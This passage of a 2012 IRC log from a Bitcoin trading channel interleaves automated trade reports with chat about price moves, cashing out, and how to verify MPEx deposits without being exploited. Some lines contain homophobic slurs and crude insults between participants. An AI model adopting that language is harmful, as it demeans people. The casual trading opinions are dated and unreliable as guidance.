14 01:39:04 [GLBSE] [TYGRR.BOND-P] 3 @ 1.05 = 3.15 BTC [+] Aug 14 01:39:05 [GLBSE] [TYGRR.BOND-P] 5 @ 1.05 = 5.25 BTC [+] Aug 14 01:40:21 [GLBSE] [TYGRR.BOND-P] 16 @ 1.055 = 16.88 BTC [+] Aug 14 01:41:18 [GLBSE] [BIB.PIRATE] 6 @ 1.02 = 6.12 BTC [+] Aug 14 01:44:29 [GLBSE] [NYAN.C] 1 @ 1.079 BTC [+] Aug 14 01:45:02 [GLBSE] [NYAN.C] 4 @ 1.08 = 4.32 BTC [+] Aug 14 01:48:55 [GLBSE] [SYNERGY] 1 @ 0.19548 BTC [+] Aug 14 01:49:17 [GLBSE] [OBSI.HRPT] 10 @ 0.1047 = 1.047 BTC [+] Aug 14 01:53:48 [MPEX] [F.GIGA.ETF] 177 @ 0.0010947 = 0.1938 BTC [+] Aug 14 01:55:39 [MPEX] [F.GIGA.ETF] 5883 @ 0.0010947 = 6.4401 BTC [+] Aug 14 01:55:40 [MPEX] [F.GIGA.ETF] 10517 @ 0.00110361 = 11.6067 BTC [+] Aug 14 01:57:06 [MPEX] [S.MPOE] 850 @ 0.00034349 = 0.292 BTC [+] Aug 14 01:57:07 [MPEX] [S.MPOE] 33124 @ 0.00034352 = 11.3788 BTC [+] Aug 14 02:04:22 [GLBSE] [TYGRR.BOND-P] 10 @ 1.054 = 10.54 BTC [-] Aug 14 02:04:24 [GLBSE] [TYGRR.BOND-P] 24 @ 1.055 = 25.32 BTC [+] Aug 14 02:04:25 [GLBSE] [TYGRR.BOND-P] 40 @ 1.057 = 42.28 BTC [+] Aug 14 02:04:26 [GLBSE] [TYGRR.BOND-P] 12 @ 1.06 = 12.72 BTC [+] Aug 14 02:04:28 [GLBSE] [TYGRR.BOND-P] 135 @ 1.06 = 143.1 BTC [+] Aug 14 02:05:06 [GLBSE] [GIGAMINING] 4 @ 1.1253 = 4.5012 BTC [-] Aug 14 02:05:08 [MPEX] [S.MPOE] 33076 @ 0.00034352 = 11.3623 BTC [+] Aug 14 02:05:08 [MPEX] [S.MPOE] 55400 @ 0.0003499 = 19.3845 BTC [+] Aug 14 02:17:36 [MPEX] [F.GIGA.ETF] 6843 @ 0.00110361 = 7.552 BTC [+] Aug 14 02:17:56 12 bucks again Aug 14 02:18:02 damn Aug 14 02:18:59 [MPEX] [S.BVPS] 600 @ 0.00299118 = 1.7947 BTC [-] Aug 14 02:18:59 [MPEX] [S.BVPS] 900 @ 0.00333325 = 2.9999 BTC [+] Aug 14 02:20:40 [GLBSE] [YABIF] 3 @ 1 = 3 BTC [-] Aug 14 02:22:37 yup, its 12. Aug 14 02:23:11 [GLBSE] [ASICMINER] 5 @ 0.1 = 0.5 BTC [+] Aug 14 02:34:25 http://www.guardian.co.uk/world/2012/aug/13/paul-ryan-sold-shares-banking-crisis oops Aug 14 02:36:42 [GLBSE] [OBSI.HRPT] 21 @ 0.10479 = 2.2006 BTC [+] Aug 14 02:36:44 [GLBSE] [OBSI.HRPT] 47 @ 0.10479 = 4.9251 BTC [+] Aug 14 02:36:53 [GLBSE] [FOO.PPPPT] 1 @ 1.049 BTC [+] Aug 14 02:37:38 dub yep its happening Aug 14 02:37:47 im getting this very wide spread low level hum Aug 14 02:38:02 after that federal ruling that banks can comingle money and nobody goes to prison nobody trusts banks anymore. Aug 14 02:39:42 wall at 12 gone Aug 14 02:41:16 [GLBSE] [TYGRR.BOND-P] 23 @ 1.061 = 24.403 BTC [+] Aug 14 02:41:29 [GLBSE] [BITBOND] 6 @ 0.3999 = 2.3994 BTC [-] Aug 14 02:43:28 yup officially over 12. Aug 14 02:44:44 is there usually a selloff when pirate investors get their interests? Aug 14 02:46:12 ug, mircea_popescu, what am i missing here. Is there a way to see that a deposit has made it into an mpex accout other than seeing that the account balance is higher? Aug 14 02:47:03 MoneyIsDebt: from what I have witnessed yes, a mild selloff Aug 14 02:47:21 great time to buy if one seeks such things Aug 14 02:47:58 i'm just going to have to do a bunch of addition and subtraction to verify actualization of deposits in order to have mpex sub-accounts, arn't i Aug 14 02:48:06 [GLBSE] [YABIF] 1 @ 1 BTC [-] Aug 14 02:48:17 I meant a sell off bitcoins on mtgox Aug 14 02:48:54 I haven't checked that, would be interesting if so. Aug 14 02:51:23 smickles you can see that the money went into the well known mpex receiving address Aug 14 02:52:10 smickles mmm, how do you mean ? Aug 14 02:52:42 MoneyIsDebt shockingly, no, that never happens. Aug 14 02:52:50 leaving some to conclude that the payments don't really happen either. Aug 14 02:53:01 or payments are reinvested Aug 14 02:53:08 which means they don't happen. Aug 14 02:53:50 well, some do happen, at least to the passthroughs Aug 14 02:54:16 but I see your point Aug 14 02:55:03 yeah. Aug 14 02:59:03 [GLBSE] [BTCMC] 4 @ 0.7101 = 2.8404 BTC [-] Aug 14 03:09:52 [GLBSE] [OBSI.HRPT] 1 @ 0.1055 BTC [+] Aug 14 03:11:20 bitcoinica on slashdot Aug 14 03:11:35 LETS DO THE TIME WARM AGAAAAAAAAAIN o/~ Aug 14 03:14:05 dub: exclusively negative comments Aug 14 03:16:06 [GLBSE] [BIB.PIRATE] 3 @ 1.0001 = 3.0003 BTC [-] Aug 14 03:16:07 [GLBSE] [BIB.PIRATE] 3 @ 1 = 3 BTC [-] Aug 14 03:18:00 the article itself is pretty stupid Aug 14 03:19:00 YES BECAUSE ITS SLASHDOT Aug 14 03:19:03 SLASHDOT IS FOR FAGS Aug 14 03:19:11 [GLBSE] [BIB.PIRATE] 8 @ 0.9999 = 7.9992 BTC [-] Aug 14 03:19:17 ACTUALLY, ITS MORE LIKE THE MONTH'S TOP SHIT STORIES FOR FAGS Aug 14 03:19:24 ITS OLD AND SHIT AND ON TOP OF THAT ALSO GAY Aug 14 03:24:04 [GLBSE] [YABIF] 4 @ 1 = 4 BTC [-] Aug 14 03:24:32 Diablo-D3: I get the feeling you don't like slashdot that much? Aug 14 03:24:38 [GLBSE] [ASICMINER] 7 @ 0.1 = 0.7 BTC [+] Aug 14 03:24:51 he's gay for hacker news Aug 14 03:24:56 MoneyIsDebt: dude, they linked to my blog on their front page three times Aug 14 03:25:07 any sense of credibility they had went out the window Aug 14 03:25:17 :) Aug 14 03:25:34 mircea_popescu: i would need to know when the funds became available in the account. is that not done manually? Aug 14 03:25:59 or is it 6 confirms? Aug 14 03:26:03 6 Aug 14 03:26:34 Diablo-D3: for funds to be available for use in an mpex account? Aug 14 03:26:37 [GLBSE] [BITCOINMINV] 9 @ 0.121 = 1.089 BTC [-] Aug 14 03:26:38 [GLBSE] [BITCOINMINV] 30 @ 0.124999 = 3.75 BTC [+] Aug 14 03:26:39 [GLBSE] [BITCOINMINV] 16 @ 0.125 = 2 BTC [+] Aug 14 03:26:53 for bitcoin to function securely Aug 14 03:27:18 if I didn't know better I would assume Diablo-D3 was drunk Aug 14 03:27:24 thanks for the attempt, but that really didn't help my quest :) Aug 14 03:27:42 since I know this isn't the case we can surmise that he is high on dick Aug 14 03:28:28 dub: go troll elsewhere. Aug 14 03:28:31 [GLBSE] [BIB.PIRATE] 100 @ 1 = 100 BTC [+] Aug 14 03:29:03 smickles funds are approved manually, yeah. Aug 14 03:29:19 mircea_popescu: then a user could take advantage of me Aug 14 03:29:23 how ? Aug 14 03:29:41 you keep a btc balance. once he's cleared with you you can use your btc balance on mpex Aug 14 03:29:44 this way you float him. Aug 14 03:29:51 you've got his btc in any case. Aug 14 03:30:43 [GLBSE] [PUREMINING] 9 @ 0.15439999 = 1.3896 BTC [+] Aug 14 03:30:55 darn, i was hoping to avoid making the deposit process longer Aug 14 03:31:06 longer than what ? or how do you mean ? Aug 14 03:32:32 mircea_popescu: if i had some confirmation of funds being available in a STAT, i could safely have the user send a deposit directly Aug 14 03:32:53 why would you have the user send a deposit directly ?! Aug 14 03:33:10 set aside an address in your own wallet, once his btc cleared you're good to go. Aug 14 03:33:39 it;s a distributed currency after all. Aug 14 03:35:02 mircea_popescu: but say my mpex acout has 10 btc in it, the user deposits 100 btc (to my wallet), i have to confirm that, forward it to mpex and wait for the funds to show up in the CxBTC before they can do anything over 10BTC Aug 14 03:35:08 and that's assuming only one user Aug 14 03:35:33 [MPEX] [F.GIGA.ETF] 4357 @ 0.00110372 = 4.8089 BTC [+] Aug 14 03:35:35 [MPEX] [F.GIGA.ETF] 1682 @ 0.00109162 = 1.8361 BTC [-] Aug 14 03:37:53 [MPEX] [F.GIGA.ETF] 4261 @ 0.00108917 = 4.641 BTC [-] Aug 14 03:37:55 [MPEX] [F.GIGA.ETF] 3464 @ 0.00110726 = 3.8355 BTC [+] Aug 14 03:38:34 and if I just wait for that specific amout to show up in my mpex account, i'm sure a clever scammer could engineer a way to fool my system and basically get a duplicate deposit Aug 14 03:39:39 user was told to deposit 1.0023232 btc; user sell something to receive exactly that Aug 14 03:40:29 i just want to figure out an 'ironclad' way of doing this Aug 14 03:40:49 which doesn't require me to hold lots of btc to float users Aug 14 03:42:00 [GLBSE] [GIGAMINING] 2 @ 1.1301 = 2.2602 BTC [+] Aug 14 03:42:48 hmm, if i wait to credit their account until I see the tx on the mpex addy, plus wait to see that amount hit my mpex funds, would that be enought to thwart a malicious user? Aug 14 03:43:05 you just float smickles Aug 14 03:43:19 [GLBSE] [BIF.BTCST.PPT] 1 @ 1.015 BTC [+] Aug 14 03:43:21 is there no better way? Aug 14 03:43:29 well what way would there be ? Aug 14 03:43:38 I'm working on it :P Aug 14 03:43:38 i mean i guess you could watch the mpex address for the specified sum, too Aug 14 03:44:23 but your design smacks me of this soviet story whereby if i wanna buy something at the corner store they make me first run to their headquarters in maine Aug 14 03:44:31 get a little payment confirmation slip Aug 14 03:44:35 and come back pick up my merchandise. Aug 14 03:45:24 [GLBSE] [NYAN.C] 20 @ 1.08 = 21.6 BTC [+] Aug 14 03:45:32 mircea_popescu: but what about when the sum of the users requests exceeds the amount of btc which is in the mpex account? Aug 14 03:46:00 user deposits 100 btc with me, user wants to spend that 100 asap Aug 14 03:46:04 that'd be a problem. get margin maybe ? Aug 14 03:46:16 oh, i forgot you offered that Aug 14 03:46:20 [GLBSE] [FPGAMINING] 1 @ 0.94 BTC [+] Aug 14 03:46:21 [GLBSE] [FPGAMINING] 3 @ 0.945 = 2.835 BTC [+] Aug 14 03:46:23 [GLBSE] [FPGAMINING] 6 @ 0.949 = 5.694 BTC [+] Aug 14 03:47:10 [GLBSE] [FPGAMINING] 4 @ 0.949 = 3.796 BTC [+] Aug 14 03:47:25 I would only be charged for use of the margin if i exceeded the amount of btc which I had in the mpex account, right? Aug 14 03:47:26 in general im available to expedite deposit confirms too, if im around. Aug 14 03:47:43 nah, margin is fixed per month, you have it might as well use it. Aug 14 03:53:13 mircea_popescu: are you so unwilling/unable to have a line in the STAT similar to the Dividend receipts section which shows recent deposits? Aug 14 03:53:59 like 2012-8-14 03:34 +10 BTC Aug 14 03:54:10 [GLBSE] [FPGAMINING] 4 @ 0.935 = 3.74 BTC [-] Aug 14 03:54:14 [GLBSE] [YABMC] 10 @ 0.124 = 1.24 BTC [-] Aug 14 03:54:54 [GLBSE] [FOO.PPPPT] 2 @ 1.0103 = 2.0206 BTC [-] Aug 14 03:55:59 [GLBSE] [HYDRO.BONDS] 1 @ 1.44 BTC [-] Aug 14 03:56:00 or, i suppose the format would be more like :On Sat, 26 May 12 00:30:47 from 1BtCaddY~~ the sum of 0.34524457 BTC Aug 14 03:56:42 [GLBSE] [BITCOINMINV] 13 @ 0.122 = 1.586 BTC [-] Aug 14 03:56:44 [GLBSE] [HYDRO.BONDS] 1 @ 1.413 BTC [-] Aug 14 03:58:49 [GLBSE] [HYDRO.BONDS] 2 @ 1.4131 = 2.8262 BTC [+] Aug 14 03:59:20 [GLBSE] [HYDRO.BONDS] 1 @ 1.4131 BTC [+] Aug 14 04:00:29 alright, after some thought, I think watching the mpex address and my mpex accout balance (while accounting for debits and credits from purchases, sales, surety, and outstanding orders) would work Aug 14 04:00:47 add dividends to that list Aug 14 04:01:17 it would be a lot less complicated if there were some kind of deposit section Aug 14 04:02:00 and i'm pretty sure, less complicated correlates with less exploitable Aug 14 04:02:10 and less error prone Aug 14 04:02:34 and slower. Aug 14 04:02:56 but i think the stat will be geting an overhaul yes. Aug 14 04:03:03 yeah, but the speed of you proposal come at a cost Aug 14 04:03:33 heh, so your saying i'll need to update some regexes? Aug 14 04:04:04 eventually. Aug 14 04:04:12 im not doing it till i have a definitive and godly version. Aug 14 04:04:22 i expect nothing less Aug 14 04:04:47 [GLBSE] [ASICMINER] 7 @ 0.1 = 0.7 BTC [+] Aug 14 04:04:50 meanwhile, i'll continue to occasionally bitch and moan about various things Aug 14 04:04:57 can;'t hurt anything. Aug 14 04:05:38 but let;'s go through this Aug 14 04:05:52 your customer wants 100 btc worth of whatever. you make the deposit order, give him the ammount Aug 14 04:06:12 once you see the mpex address getting that ammount in the transaction chain with 6 confirms you're good. neh ? Aug 14 04:06:40 yeah, (if i have teh btc in the mpex account as well) Aug 14 04:06:59 [MPEX] [S.MPOE] 13861 @ 0.00038267 = 5.3042 BTC [+] Aug 14 04:07:00 [MPEX] [S.MPOE] 22900 @ 0.0003876 = 8.876 BTC [+] Aug 14 04:07:28 ya. if not you'll have to whine :) Aug 14 04:08:29 my issue is that programatically verifying that it's there (without an indication from mpex that it's there) may open up unkown exploits in my operation Aug 14 04:08:45 to wit ? Aug 14 04:08:55 [GLBSE] [OBSI.HRPT] 5 @ 0.1055 = 0.5275 BTC [+] Aug 14 04:08:56 [GLBSE] [OBSI.HRPT] 15 @ 0.1055 = 1.5825 BTC [+] Aug 14 04:09:14 yes, i can prevent the exploit which I originally brought up thru careful monitoring, but who's to say there's one I have't thought of Aug 14 04:09:46 well in that sense... Aug 14 04:10:57 k, so maybe that's too broad of a statement, but, Aug 14 04:11:38 i believe I'm doing everything else more than reasonably securely, but the deposit method, i'm unsure of Aug 14 04:12:22 i'd be more worried about withdrawals in your scheme. Aug 14 04:12:42 I was planning on haveing that be a manual process Aug 14 04:12:51 aha Aug 14 04:13:23 well that reduces the incentive Aug 14 04:13:37 i mean, why would someone fuck you up on deposits if thery can't withdraw the benefit ? Aug 14 04:13:53 o nm, they could just buy their own shares. strike that last line it's stupid. Aug 14 04:14:01 as well as having a system to point out 'out of the ordinary' withdrawal request to me Aug 14 04:14:18 heh, i thought of situations like that :) Aug 14 04:14:39 [GLBSE] [OBSI.1MHS] 10 @ 0.1 = 1 BTC [+] Aug 14 04:14:58 malicious users be crafty mother fuckers Aug 14 04:16:42 heh Aug 14 04:17:57 mircea_popescu: the more i think about it. the 'watching mpex addy and keeping track of stuff internally' method isn't as complicated as i made it out to be Aug 14 04:18:41 [MPEX] [S.MPOE] 9839 @ 0.00038796 = 3.8171 BTC [+] Aug 14 04:18:42 we're talking about a program here. all i'd have to do is a line that summs what I expect user accounts balances to be and compares it to the stat Aug 14 04:19:48 but, as you said, it's not a perfect solution to have my users wait on your manual deposit confirmation Aug 14 04:21:32 if only I had enough btc in my pocket to not care about floating users a few k coin here and there when I know there's 6 confirms on the tx Aug 14 04:25:44 you don't have to start with few k coins Aug 14 04:25:55 if you think about it, somebody with 1k in capital is prollybetter off making his own acct Aug 14 04:26:04 and also, he prolly should be afforded personal attention anyway. Aug 14 04:26:17 this isn't bullshit post-Casino irl. this is pre-Casino Aug 14 04:26:21 you seen that film incidentally ? Aug 14 04:26:29 [GLBSE] [ASICMINER] 5 @ 0.1 = 0.5 BTC [+] Aug 14 04:27:07 "Today, it's all gone. You get a whale show up with four million in a suitcase, and some twenty-five-year-old hotel school kid is gonna want his Social Security Number." Aug 14 04:27:47 mircea_popescu: well, i was exaggerating about 'k's, i would, of course, cater to large clients Aug 14 04:28:04 so all you need is maybe a coupla hundred to float anything. Aug 14 04:29:29 yeah, then I just need to keep track of how much of the float funds are being earmarked at any given moment Aug 14 04:29:44 [GLBSE] [COGNITIVE] 1 @ 0.66 BTC [-] Aug 14 04:30:19 [GLBSE] [BIF.1YR.LOAN] 1 @ 0.96153845 BTC [-] Aug 14 04:30:27 maybe shoot myself an email when all the float is used so that i can check in on 'the goings on' Aug 14 04:32:02 [GLBSE] [TYGRR.BOND-P] 8 @ 1.0599 = 8.4792 BTC [-] Aug 14 04:36:06 [MPEX] [S.MPOE] 22861 @ 0.00038087 = 8.7071 BTC [-] Aug 14 04:36:08 [MPEX] [S.MPOE] 17383 @ 0.00038996 = 6.7787 BTC [+] Aug 14 04:38:35 [MPEX] [S.MPOE] 19900 @ 0.00038996 = 7.7602 BTC [+] Aug 14 04:41:40 [GLBSE] [HYDRO.BONDS] 2 @ 1.51989999 = 3.0398 BTC [+] Aug 14 04:42:53 [GLBSE] [TYGRR.BOND-B] 1 @ 0.1001 BTC [+] Aug 14 04:42:54 [GLBSE] [TYGRR.BOND-B] 1 @ 0.1 BTC [-] Aug 14 04:43:28 [GLBSE] [BITCOINMINV] 16 @ 0.123 = 1.968 BTC [+] Aug 14 04:47:29 what is the best way to get btc into a us bank account? Aug 14 04:48:10 "best"? Aug 14 04:48:18 [GLBSE] [YABMC] 16 @ 0.11931 = 1.909 BTC [-] Aug 14 04:48:18 well.. a way Aug 14 04:48:27 spendbitcoins.com just stopped supporting usa Aug 14 04:48:28 and i dont like gox really Aug 14 04:48:37 how's bitfloor looking these days? Aug 14 04:49:06 "Free ACH withdraw" Aug 14 04:49:24 "Avoid third party services and credit your US bank account directly using our free ACH withdraw option." Aug 14 04:49:35 i saw bitfloor but there is a delay for getting verified or something Aug 14 04:49:35 [GLBSE] [HYDRO.BONDS] 2 @ 1.51989999 = 3.0398 BTC [+] Aug 14 04:49:35 [GLBSE] [HYDRO.BONDS] 2 @ 1.51999999 = 3.04 BTC [+] Aug 14 04:49:43 i kinda wanted to do it right away Aug 14 04:50:37 heh, looks like there's ~1000btc arb op bitfloor <-> mtgox Aug 14 05:07:55 yeah... wish my bot was still running... Aug 14 05:10:31 what happened to it ? Aug 14 05:16:49 http://fastcash4bitcoins.com/Options.aspx anyone else use this site? Aug 14 05:17:43 looks scammy... Aug 14 05:18:23 o wait, it's tangible's ? Aug 14 05:18:49 https://bitcointalk.org/index.php?action=profile;u=57640 Aug 14 05:19:35 https://bitcointalk.org/index.php?action=printpage;topic=99034.0 recently borrowed like 35k. Aug 14 05:25:10 https://bitcointalk.org/index.php?topic=90192.msg1097789#msg1097789 Aug 14 05:25:19 i'm not sure what that means tho Aug 14 05:27:06 smickles: now all you need to do is xfer some USD into bitfloor before that spread moves ;) Aug 14 05:29:22 he really should fix that website Aug 14 05:29:39 it looks like something made by a noob scammer. Aug 14 05:32:18 [GLBSE] [BTC-MINING] 4 @ 0.96 = 3.84 BTC [-] Aug 14 05:35:40 [GLBSE] [BFLS] 2 @ 0.95 = 1.9 BTC [-] Aug 14 05:35:40 [GLBSE] [BFLS] 8 @ 0.93831851 = 7.5065 BTC [-] Aug 14 05:40:16 [GLBSE] [BFLS.RIG] 10 @ 0.97 = 9.7 BTC [-] Aug 14 05:40:16 [GLBSE] [BFLS.RIG] 2 @ 0.979 = 1.958 BTC [+] Aug 14 05:59:01 [GLBSE] [MU] 1 @ 0.51 BTC [+] Aug 14 05:59:28 [GLBSE] [OBSI.HRPT] 5 @ 0.105 = 0.525 BTC [-] Aug 14 06:03:49 hmm, is assbot off kakobrekla ? Aug 14 06:09:06 [GLBSE] [YABMC] 13 @ 0.1193 = 1.5509 BTC [-] Aug 14 06:10:50 [GLBSE] [FPGAMINING] 3 @ 0.966 = 2.898 BTC [+] Aug 14 06:11:51 lol no, it seems to just not pick mpex stuff anymore >< Aug 14 06:15:38 MPEx ‏@MPEx1 Aug 14 06:15:38 14`200 S.MPOE @ 0.00037788BTC = 5.36589600BTC (= 63.10 USD). #trade #bitcoin #btc #stocks Aug 14 06:15:38 Expand Aug 14 06:15:38 Reply Retweet Favorite Aug 14 06:15:38 12m Aug 14 06:15:38 MPEx ‏@MPEx1 Aug 14 06:15:38 17`100 S.MPOE @ 0.00038419BTC = 6.56964900BTC (= 77.26 USD). #trade #bitcoin #btc #stocks Aug 14 06:15:38 Expand Aug 14 06:15:38 Reply Retweet Favorite Aug 14 06:15:38 13m Aug 14 06:15:38 MPEx ‏@MPEx1 Aug 14 06:15:38 600 O.BTCUSD.C110T @ 0.18402280BTC = 110.41368000BTC (= 1`298.46 USD). #trade #bitcoin #btc #options Aug 14 06:15:38 Expand Aug 14 06:15:38 Reply Retweet Favorite Aug 14 06:15:38 16m Aug 14 06:15:38 MPEx ‏@MPEx1 Aug 14 06:15:38 1 O.BTCUSD.C110T @ 0.18394238BTC = 0.18394238BTC (= 2.16 USD). #trade #bitcoin #btc #options Aug 14 06:15:38 Expand Aug 14 06:15:38 Reply Retweet Favorite Aug 14 06:15:38 17m Aug 14 06:15:38 MPEx ‏@MPEx1 Aug 14 06:15:38 13`602 S.MPOE @ 0.00039477BTC = 5.36966154BTC (= 63.15 USD). #trade #bitcoin #btc #stocks Aug 14 06:15:38 Expand Aug 14 06:15:38 Reply Retweet Favorite Aug 14 06:15:38 23m Aug 14 06:15:38 MPEx ‏@MPEx1 Aug 14 06:15:38 4`276 S.MPOE @ 0.00039477BTC = 1.68803652BTC (= 19.85 USD). #trade #bitcoin #btc #stocks Aug 14 06:15:40 etc. Aug 14 06:22:43 [MPEX] [S.MPOE] 5717 @ 0.00038996 = 2.2294 BTC [+] Aug 14 06:22:43 [MPEX] [S.MPOE] 45500 @ 0.00039313 = 17.8874 BTC [+] Aug 14 06:22:43 [MPEX] [S.MPOE] 4483 @ 0.00039477 = 1.7698 BTC [+] Aug 14 06:23:12 [GLBSE] [FPGAMINING] 2 @ 0.966 = 1.932 BTC [+] Aug 14 06:23:37 [GLBSE] [BITCOINMINV] 80 @ 0.119 = 9.52 BTC [-] Aug 14 06:24:00 whoa that stuff's from like an hour ago. Aug 14 06:35:41 [GLBSE] [BFLS] 1 @ 0.9 BTC [-] **** ENDING LOGGING AT Tue Aug 14 06:43:26 2012 **** BEGIN LOGGING AT Tue Aug 14 06:43:46 2012 **** ENDING LOGGING AT Tue Aug 14 06:43:59 2012 **** BEGIN LOGGING AT Tue Aug 14 06:47:09 2012 Aug 14 06:48:38 [GLBSE] [NYAN.C] 4 @ 1.055 = 4.22 BTC [-] Aug 14 06:48:40 [GLBSE] [NYAN.C] 10 @ 1.051 = 10.51 BTC [-] Aug 14 06:48:41 [GLBSE] [NYAN.C] 10 @ 1.05 = 10.5 BTC [-] Aug 14 06:48:41 [GLBSE] [NYAN.C] 76 @ 1.045 = 79.42 BTC [-] Aug 14 06:49:18 [GLBSE] [NYAN.C] 9 @ 1.045 = 9.405 BTC [-] Aug 14 06:49:19 [GLBSE] [NYAN.C] 1 @ 1.021 BTC [-] Aug 14 06:53:03 [GLBSE] [FUTUREFUND] 2300 @ 0.00011485 = 0.2642 BTC [+] Aug 14 06:53:37 [GLBSE] [OBSI.HRPT] 11 @ 0.1054999 = 1.1605 BTC [+] Aug 14 06:53:39 [GLBSE] [OBSI.HRPT] 85 @ 0.1055 = 8.9675 BTC [+] Aug 14 06:53:40 [GLBSE] [OBSI.HRPT] 87 @ 0.1056 = 9.1872 BTC [+] Aug 14 06:53:40 [GLBSE] [OBSI.HRPT] 200 @ 0.106 = 21.2 BTC [+] Aug 14 06:53:42 [GLBSE] [OBSI.HRPT] 400 @ 0.1068 = 42.72 BTC [+] Aug 14 06:53:43 [GLBSE] [OBSI.HRPT] 140 @ 0.1069 = 14.966 BTC [+] Aug 14 06:53:44 [GLBSE] [FUTUREFUND] 49 @ 0.00011485 = 0.0056 BTC [+] Aug 14 07:04:48 [GLBSE] [NASTY] 1 @ 0.5449 BTC [+] Aug 14 07:05:17 [GLBSE] [ASICMINER] 19 @ 0.1 = 1.9 BTC [+] Aug 14 07:09:48 [GLBSE] [OBSI.HRPT] 5 @ 0.103 = 0.515 BTC [-] Aug 14 07:09:50 [GLBSE] [OBSI.HRPT] 22 @ 0.102 = 2.244 BTC [-] Aug 14 07:10:23 [GLBSE] [BDT] 3 @ 1.07989999 = 3.2397 BTC [+] Aug 14 07:10:24 [GLBSE] [BDT] 7 @ 1.07999999 = 7.56 BTC [+] Aug 14 07:12:09 [GLBSE] [PPT.E] 2 @ 1.199 = 2.398 BTC [+] Aug 14 07:12:26 [GLBSE] [BIF.1YR.LOAN] 1 @ 0.96153845 BTC [-] Aug 14 07:12:27 [GLBSE] [BIF.1YR.LOAN] 29 @ 0.96153846 = 27.8846 BTC [+] Aug 14 07:15:12 [MPEX] [O.BTCUSD.C100T] 120 @ 0.24715528 = 29.6586 BTC [+] Aug 14 07:16:26 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.70133306 = 701.3331 BTC [-] Aug 14 07:16:52 [GLBSE] [FUTUREFUND] 74889 @ 0.00011485 = 8.601 BTC [+] Aug 14 07:16:54 [GLBSE] [FUTUREFUND] 25111 @ 0.00011716 = 2.942 BTC [+] Aug 14 07:17:14 [GLBSE] [MOVETO.FUND] 1 @ 1.085 BTC [-] **** BEGIN LOGGING AT Tue Aug 14 11:21:08 2012 Aug 14 11:24:52 [GLBSE] [TYGRR.BOND-PI] 5 @ 1.6 = 8 BTC [-] Aug 14 11:25:43 [GLBSE] [YARR] 2 @ 1.52 = 3.04 BTC [+] Aug 14 11:29:26 [GLBSE] [GIGAMINING] 4 @ 1.1301 = 4.5204 BTC [-] Aug 14 11:29:27 [GLBSE] [GIGAMINING] 10 @ 1.13 = 11.3 BTC [-] Aug 14 11:29:29 [GLBSE] [GIGAMINING] 3 @ 1.1252 = 3.3756 BTC [-] Aug 14 11:29:29 [GLBSE] [GIGAMINING] 5 @ 1.1252 = 5.626 BTC [-] Aug 14 11:29:30 [GLBSE] [GIGAMINING] 60 @ 1.1201 = 67.206 BTC [-] Aug 14 11:30:14 [GLBSE] [BIB.PIRATE] 3 @ 1.01 = 3.03 BTC [-] Aug 14 11:30:54 [MPEX] [O.BTCUSD.P110T] 6 @ 0.10224318 = 0.6135 BTC [-] Aug 14 11:32:58 [MPEX] [S.MPOE] 29900 @ 0.00036851 = 11.0184 BTC [-] Aug 14 11:36:47 [GLBSE] [HYDRO.BONDS] 21 @ 1.49999 = 31.4998 BTC [-] Aug 14 11:36:49 [GLBSE] [HYDRO.BONDS] 30 @ 1.5 = 45 BTC [+] Aug 14 11:36:52 [GLBSE] [GIGAMINING] 3 @ 1.12 = 3.36 BTC [-] Aug 14 11:41:43 [GLBSE] [ASICMINER] 11 @ 0.1 = 1.1 BTC [+] Aug 14 11:45:56 [GLBSE] [BITBOND] 1 @ 0.4499 BTC [+] Aug 14 11:49:25 [GLBSE] [OBSI.HRPT] 20 @ 0.106 = 2.12 BTC [+] Aug 14 11:56:52 [GLBSE] [PUREMINING] 20 @ 0.15439999 = 3.088 BTC [+] Aug 14 12:00:12 [GLBSE] [GIGAMINING] 4 @ 1.09110002 = 4.3644 BTC [-] Aug 14 12:00:14 [GLBSE] [GIGAMINING] 2 @ 1.09100002 = 2.182 BTC [-] Aug 14 12:00:15 [GLBSE] [GIGAMINING] 19 @ 1.06250001 = 20.1875 BTC [-] Aug 14 12:02:45 [GLBSE] [ASICMINER] 70 @ 0.1 = 7 BTC [+] Aug 14 12:03:10 [GLBSE] [ASICMINER] 99 @ 0.1 = 9.9 BTC [+] Aug 14 12:05:01 [GLBSE] [YABMC] 48 @ 0.1229 = 5.8992 BTC [+] Aug 14 12:08:08 [GLBSE] [FOO.PPPPT] 2 @ 1.0202 = 2.0404 BTC [+] Aug 14 12:08:09 [GLBSE] [FOO.PPPPT] 8 @ 1.0201 = 8.1608 BTC [-] Aug 14 12:09:20 [GLBSE] [GIGAMINING] 1 @ 1.139 BTC [+] Aug 14 12:09:21 [GLBSE] [GIGAMINING] 2 @ 1.139 = 2.278 BTC [+] Aug 14 12:10:05 [GLBSE] [TYGRR.BOND-P] 10 @ 1.06 = 10.6 BTC [-] Aug 14 12:11:19 [GLBSE] [FPGAMINING] 1 @ 0.9 BTC [-] Aug 14 12:13:15 [MPEX] [O.HASH.P10TH] 140000 @ 0.02757553 = 3860.5742 BTC [+] Aug 14 12:21:43 [GLBSE] [OBSI.HRPT] 40 @ 0.105 = 4.2 BTC [-] Aug 14 12:23:50 [MPEX] [S.BVPS] 786 @ 0.00345126 = 2.7127 BTC [+] Aug 14 12:23:51 [MPEX] [S.BVPS] 214 @ 0.00340326 = 0.7283 BTC [-] Aug 14 12:24:52 [MPEX] [S.BVPS] 1350 @ 0.00347893 = 4.6966 BTC [+] Aug 14 12:24:53 [MPEX] [S.BVPS] 1150 @ 0.00355512 = 4.0884 BTC [+] Aug 14 12:24:54 [MPEX] [S.BVPS] 700 @ 0.00357367 = 2.5016 BTC [+] Aug 14 12:50:28 [GLBSE] [FOO.PPPPT] 4 @ 1.0299 = 4.1196 BTC [+] Aug 14 12:50:29 [GLBSE] [FOO.PPPPT] 16 @ 1.03 = 16.48 BTC [+] Aug 14 12:51:38 [GLBSE] [FOO.PPPPT] 2 @ 1.03 = 2.06 BTC [+] Aug 14 12:54:04 [MPEX] [S.MPOE] 3269 @ 0.00037223 = 1.2168 BTC [+] Aug 14 12:54:06 [MPEX] [S.MPOE] 28528 @ 0.00037798 = 10.783 BTC [+] Aug 14 12:55:32 morning :) Aug 14 12:59:58 good morning DT Aug 14 12:59:58 [GLBSE] [OBSI.HRPT] 2 @ 0.105 = 0.21 BTC [-] Aug 14 13:02:52 [GLBSE] [TYGRR.BOND-P] 1 @ 1.059 BTC [-] Aug 14 13:06:24 [GLBSE] [BIB.PIRATE] 1 @ 1.0125 BTC [+] Aug 14 13:07:18 [MPEX] [S.MPOE] 4900 @ 0.00036851 = 1.8057 BTC [-] Aug 14 13:07:55 [GLBSE] 